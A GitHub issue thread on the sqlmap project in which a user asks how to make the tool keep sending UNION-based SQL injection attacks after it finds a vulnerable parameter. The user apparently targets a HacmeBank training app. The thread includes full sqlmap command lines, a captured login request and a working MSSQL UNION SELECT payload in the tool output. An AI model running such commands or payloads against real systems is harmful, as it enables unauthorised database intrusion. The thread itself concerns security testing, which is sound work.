### ISSUE TITLE
How can I force SQLMap to execute all attacks after it display a parameter is vulnerable

### ISSUE THREAD

**Issue by mohamyass** [sqlmapproject/sqlmap#1711]
Hi all,

I know my Web Application is vulnertable but I want to execute a big quantity of attacks. unfortunately, SQLMap stops to send attacks if it discover that the URL/parameter is vulnerable.

Thank you

**Comment by stamparm** [comment]
But why? If you want to see what sqlmap sends you can rename the vulnerable parameter name from e.g. `id=` to `foobar=`. That way sqlmap will send you tons of requests

**Comment by mohamyass** [comment]
Hi,
Thank you. There is my commande:
python sqlmap\sqlmap.py -r hacme.txt -p txtUserName  --risk=3 --level=5 --technique=u --dbms=MSSQL --union-cols 1-8 --union-char=UCHAR

it sends only many requests and display txt UserName is vulnerable

**Comment by stamparm** [comment]
I still don't know what are you trying to do. If you want to generate junk requests then rename `txtUserName` inside `hacme.txt` to `foobar` and rerun with `-p foobar`

**Comment by mohamyass** [comment]
I do it, but I have the same problem:

[*] starting at 10:42:22

[10:42:22] [INFO] parsing HTTP request from 'hacme.txt'
[10:42:23] [INFO] testing connection to the target URL
[10:42:24] [INFO] heuristics detected web page charset 'windows-1252'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: foobar (POST)
    Type: UNION query
    Title: Generic UNION query (UCHAR) - 1 column (custom)
    Payload: __VIEWSTATE=/wEPDwUJMzIyNTUyNzAyZGRiYXApxGKljrM3TKc+VEfjM0pDqBK1mLN
RiEi4tHPi4w==&__EVENTVALIDATION=/wEdAATv53GlKR9jHqlV38gABLVhY3plgk0YBAefRz3MyBlT
cHY2+Mc6SrnAqio3oCKbxYY85pbWlDO2hADfoPXD/5tdVQDg8ePLdX4oW0YLh8AMNtT00ETe+i3zjAmd
VjcLu9Y=&foobar=JV' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(98)+CHAR(
113)+CHAR(121)+CHAR(67)+CHAR(101)+CHAR(108)+CHAR(105)+CHAR(72)+CHAR(70)+CHAR(116
)+CHAR(86)+CHAR(72)+CHAR(76)+CHAR(98)+CHAR(69)+CHAR(109)+CHAR(80)+CHAR(79)+CHAR(
97)+CHAR(85)+CHAR(106)+CHAR(77)+CHAR(117)+CHAR(98)+CHAR(99)+CHAR(115)+CHAR(66)+C
HAR(104)+CHAR(97)+CHAR(74)+CHAR(81)+CHAR(84)+CHAR(68)+CHAR(103)+CHAR(82)+CHAR(83
)+CHAR(68)+CHAR(88)+CHAR(67)+CHAR(107)+CHAR(73)+CHAR(118)+CHAR(113)+CHAR(98)+CHA
R(107)+CHAR(118)+CHAR(113)-- -&txtPassword=JV789&btnSubmit=Submit
---
[10:42:24] [INFO] testing Microsoft SQL Server
[10:42:24] [INFO] confirming Microsoft SQL Server
[10:42:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
[10:42:25] [INFO] fetched data logged to text files under 'C:\Users\mohamed\.sql
map\output\52.25.139.95'

**Comment by stamparm** [comment]
Which revision do you run?

**Comment by mohamyass** [comment]
Thank You.

There is my hacme.txt:
POST http://52.25.139.95/hacmebank/aspx/LogIn.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://52.25.139.95/hacmebank/aspx/LogIn.aspx
Accept-Language: en-CA,en;q=0.5
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; VER#9C#80836766876745485357484874; MATBJS; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 303
DNT: 1
Host: 52.25.139.95
Pragma: no-cache
Cookie: ASP.NET_SessionId=5c2gf5pynuqawrpbvfgqwlr2; CookieLoginAttempts=

__VIEWSTATE=%2FwEPDwUJMzIyNTUyNzAyZGRiYXApxGKljrM3TKc%2BVEfjM0pDqBK1mLNRiEi4tHPi4w%3D%3D&__EVENTVALIDATION=%2FwEdAATv53GlKR9jHqlV38gABLVhY3plgk0YBAefRz3MyBlTcHY2%2BMc6SrnAqio3oCKbxYY85pbWlDO2hADfoPXD%2F5tdVQDg8ePLdX4oW0YLh8AMNtT00ETe%2Bi3zjAmdVjcLu9Y%3D&foobar=JV&txtPassword=JV789&btnSubmit=Submit


I execute with foobar and It display:

[*] starting at 11:18:41

[11:18:41] [INFO] parsing HTTP request from 'hacme.txt'
[11:18:43] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://52.25.139.95:80/hacmebank/aspx/main.aspx?fu
nction=Welcome'. Do you want to follow? [Y/n] N
[11:18:44] [INFO] heuristics detected web page charset 'ascii'
[11:18:45] [WARNING] heuristic (basic) test shows that POST parameter 'foobar'  might not be injectable
[11:18:46] [INFO] testing for SQL injection on POST parameter 'foobar' 
[11:18:46] [INFO] testing 'Generic UNION query (UCHAR) - 1 to 8 columns (custom)
'
[11:18:47] [INFO] heuristics detected web page charset 'windows-1252'
[11:18:47] [WARNING] reflective value(s) found and filtering out
[11:19:24] [INFO] target URL appears to be UNION injectable with 1 columns
[11:19:27] [INFO] POST parameter 'foobar' is 'Generic UNION query (UCHAR) -
 1 to 8 columns (custom)' injectable
[11:19:27] [INFO] checking if the injection point on POST parameter 'foobar'  is a false positive
POST parameter 'foobar' is vulnerable. Do you want to keep testing the othe
rs (if any)? [y/N]

I want to send a big quantity of union attacks and not just only 2 attacks. I want to execute, for example, 1000 attacks.

Thank you.

mohamyass

**Comment by mohamyass** [comment]
Hi again,
Execue me. there is my commande:

python sqlmap\sqlmap.py -r hacme.txt -p foobar  --risk=3 --level=5 --technique=u  --dbms=MSSQL --union-cols 1-8 --union-char=UCHAR --answer="redirect=N"
